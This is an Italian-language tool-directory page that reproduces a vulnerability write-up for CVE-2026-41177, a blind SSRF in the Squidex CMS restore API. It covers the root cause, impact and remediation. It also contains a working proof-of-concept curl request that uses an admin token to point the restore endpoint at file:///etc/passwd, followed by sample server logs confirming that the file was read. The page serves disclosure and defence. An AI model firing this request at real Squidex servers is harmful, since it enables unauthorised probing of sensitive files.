Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-41177-Squidex-CMS — CVE-2026-41177, una vulnerabilità Blind SSRF in Squidex CMS (precedente alla v7.23.0). Include analisi della causa principale, passaggi di riproduzione e valutazione dell'impatto riguardante l'Interazione con File Locali (LFI). | Kitploit
Strumenti/GitHubGitHub/turkios/cve-2026-41177-squidex-cms
Analisi delle VulnerabilitàExploitSicurezza WebApprendimento e Formazione
GitHubturkios/cve-2026-41177-squidex-cms

CVE-2026-41177-Squidex-CMS

CVE-2026-41177, una vulnerabilità Blind SSRF in Squidex CMS (precedente alla v7.23.0). Include analisi della causa principale, passaggi di riproduzione e valutazione dell'impatto riguardante l'Interazione con File Locali (LFI).

Vedi Repository
4 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-41177: Blind SSRF in Squidex CMS

Ricerca tecnica e analisi per CVE-2026-41177: una vulnerabilità di Server-Side Request Forgery (SSRF) cieca nell'API di ripristino di Squidex CMS.

Panoramica della vulnerabilità

  • ID CVE: CVE-2026-41177
  • Componente interessato: API Squidex: motore di backup/ripristino (/api/apps/restore)
  • Versioni interessate: < 7.23.0
  • Tipo di vulnerabilità: SSRF cieco (CWE-918), interazione con file locali (CWE-73)

Riepilogo

L'API di ripristino di Squidex è vulnerabile a Server-Side Request Forgery (SSRF) cieco. L'applicazione non riesce a validare lo schema URI del parametro Url fornito dall'utente, consentendo l'uso del protocollo file://. Ciò consente a un amministratore autenticato di forzare il server backend a interagire con il filesystem locale, portando a un'interazione con file locali (LFI) e alla potenziale divulgazione di informazioni sensibili di sistema attraverso l'analisi dei canali laterali dei log interni.

Dettagli

  1. Configurazione: un attaccante crea un job di "ripristino" utilizzando un URI del filesystem locale (ad es., file:///etc/passwd).
  2. Attivazione: l'attaccante invia la richiesta POST all'endpoint di ripristino.
  3. Esecuzione: il backend accetta la richiesta e passa l'URL a un worker in background (RestoreJob).
  4. Osservazione: mentre la risposta API è un generico 204 No Content, i log interni del server rivelano che il server ha aperto e letto con successo il file prima di fallire perché il contenuto non era un archivio ZIP valido.

Proof of Concept (PoC)

1. Richiesta dannosa

Esegui il seguente comando curl (sostituisci <TOKEN> con un token admin valido):

root@kitploit:~
curl -X POST http://localhost/api/apps/restore/ \
  -H 'Authorization: Bearer <TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{
    "Url": "file:///etc/passwd",
    "Name": "exploit-poc"
  }' -v

2. Validazione tramite log

Il seguente errore nei log del container Squidex conferma l'interazione interna con il file:

root@kitploit:~
{
  "logLevel": "Error",
  "message": "Backup with job id 381bcfcb-3701-44d0-a8c8-ea43b3ec6271 from URL 'file:///etc/passwd' failed.",
  "exception": {
    "type": "System.IO.InvalidDataException",
    "message": "End of Central Directory record could not be found.",
    "stackTrace": "at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\n at System.IO.Compression.ZipArchive..ctor(Stream stream...)\n at Squidex.Domain.Apps.Entities.Backup.BackupReader..ctor(...) in BackupReader.cs:line 42\n at Squidex.Domain.Apps.Entities.Backup.TempFolderBackupArchiveLocation.OpenReaderAsync(...) in TempFolderBackupArchiveLocation.cs:line 57"
  }
}

Nota: l'InvalidDataException conferma che il server ha acceduto e letto con successo i byte del file.

Impatto

Questa vulnerabilità consente agli attaccanti autenticati di:

  • Ricognizione del filesystem: confermare la presenza di file sensibili (ad es., appsettings.json, segreti).
  • Divulgazione di informazioni: in ambienti multi-tenant, ciò potrebbe potenzialmente essere utilizzato per accedere ai file di backup di altri utenti.

Rimedio

  • Aggiornamento: aggiorna a Squidex versione 7.23.0 o successiva.
  • Whitelist dei protocolli: consenti strettamente solo gli schemi http:// e https://.
  • Validazione dell'input: implementa un controllo per rifiutare qualsiasi URI che utilizzi lo schema file:// prima dell'elaborazione.
  • Gestione sicura dell'I/O: assicurati che gli handler sottostanti siano limitati dalla risoluzione del filesystem locale per gli input forniti dall'utente.

Riferimenti

  • GitHub Security Advisory (GHSA-45fq-w37p-qfw5)
  • Official CVE Record
Scarica lo strumento